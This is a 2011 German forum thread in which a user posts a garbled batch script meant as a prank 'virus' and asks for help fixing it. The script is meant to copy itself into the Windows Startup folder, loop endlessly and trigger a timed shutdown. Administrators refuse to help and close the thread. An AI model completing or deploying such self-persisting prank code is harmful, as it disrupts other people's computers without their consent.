Zurück   EffizienzGurus Forum > Software & mehr > Anwendungsprogramme

Hinweise

Batch datein preisfrage wer findet die fehler hilfe :)

Dieses Thema wurde 3 mal beantwortet und 1779 x angesehen.

Thema geschlossen
 
Themen-Optionen
Alt 04.07.2011, 18:47   #1
Könner
 
Registriert seit: 08.2009
Ort: bad radkersburg
Beiträge: 111
Standard Batch datein preisfrage wer findet die fehler hilfe :)

ok wer findet den fehler ziel ist es das eine batch datei eine batchdatei erstellt in der ne endlosschleife drinensteht und diese in den autostart rienkopiert das mit dem erstellen geht die schleife geht auch nur das reinkopieren funkt net jetzt war cih frustiert weil cihs chon ne ganze weile dran sietz und hab sinnlos kopierpfade reingehauen also bitte an alle oldscool kiddis unter euch haut in die tasten und schriebt mir das richtig bitte

skript
echo >> start start virus.bat "haha genießt die ferien viel spass ihr looser" start virus.bat "haha genißst die ferien viel spass ihr looser" chcp 1252
xcopy "C:\Users\%userprofile%\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\"
chcp 1252
xcopy %0 "C:\Users\%userprofile%\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup">> C:\virus.bat
chcp 1252
xcopy "C:\Users\%userprofile%\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup"
chcp 1252
xcopy %0 "C:\Users\%userprofile%\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\"
"C:\Users\%userprofile%\AppData\Roaming\Microsoft\ Windows\Start Menu\Programs\Startup\"
shutdown -t 20 -c "looser"
shutdown -a
pause


danke

Hinzugefügter Beitrag (autom. Zusammenführung):
bin acuh für vorschläge offen wie ich mit einmaligena usführen einer datei eine batchdatei mit endlosschleife erstelle und die in den autostart bekomme das mit dem selbstantpackenden exe archiven is ne gutte idee finde da aber nix gute

ps das zeug is net bös gemeint es is als zeugniss streich gedacht

Hinzugefügter Beitrag (autom. Zusammenführung):
ok ich ahb jtzt andere herangeshensweise meine datei ist eins elbstentpackendes arhiv geworden und sol sich den autostart etpacken das geht heir auf eminem pc porblemlos aber auf andern net obwol cih den benutzer durch %userprofile$ ersetzt ahbe jemand ne idee waru ? auf dena ndern pc macht ers einfach in dem ordner wo grad die datei is -.-

Geändert von rose161 (04.07.2011 um 20:43 Uhr) Grund: Antwort auf eigenen Beitrag innerhalb von 3 Stunden
rose161 ist offline  
Alt 04.07.2011, 22:37   #2
Administrator
Mädchen für Alles
 
Benutzerbild von smoothwater
 
Registriert seit: 08.2008
Ort: Halle (Saale)
Beiträge: 2.955
Standard

1.: Bitte passe Deine Rechtschreibung an!
2.: Jokeprogramme, die so etwas machen, sind bei Jedermann äußerst unbeliebt. All zu viele Helfer wirst Du dahingehend also nicht finden...
__________________
Desktop
smoothwater ist offline  
Alt 06.07.2011, 19:01   #3
Könner
 
Registriert seit: 08.2009
Ort: bad radkersburg
Beiträge: 111
Standard

komm schon wir waren alle ma kinder
rose161 ist offline  
Alt 06.07.2011, 20:12   #4
Administrator in Rente
Bughunter
 
Benutzerbild von buyman
 
Registriert seit: 09.2006
Ort: Salzburg (Österreich)
Beiträge: 3.571
Standard

Zitat:
Zitat von rose161 Beitrag anzeigen
komm schon wir waren alle ma kinder
Ja waren wir (manche sinds wahrscheinlich noch immer ).

Hilfe kannst du hier aber wie du bemerkt hast trotzdem keine Erwarten. Ich bin jetzt auch zu faul mir das anzusehen. Wenn du den Streich hinbekommen willst wirst du es auch selbst schaffen.

Da wir von dem Streich ansich und insbesondere von deinem lieblosen Eröffnungspost nichts halten: closed.
__________________
Früher im Sandkasten war das alles viel einfacher:
Da gabs was mit der Schüppe auf die Fresse ... und gut wars - aber Heute?
Werd auch du ein Guru
buyman ist offline  
Thema geschlossen

Lesezeichen

Themen-Optionen

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are aus
Pingbacks are an
Refbacks are aus

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Wie findet ihr so was? grille Plaudereck' 3 06.11.2009 22:23
Eingabegebietsschema per Batch hinzufügen mikexmagic Betriebssysteme 0 23.09.2009 16:21
Neuer i7: Schlechter Batch lordgort Prozessoren 3 20.01.2009 07:59
Intel Core 2 Duo Batch - Bedeutung? Priester Prozessoren 0 28.04.2007 11:32


Alle Zeitangaben in WEZ +1. Es ist jetzt 18:20 Uhr.


Powered by vBulletin® Version 3.7.5 (Deutsch)
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41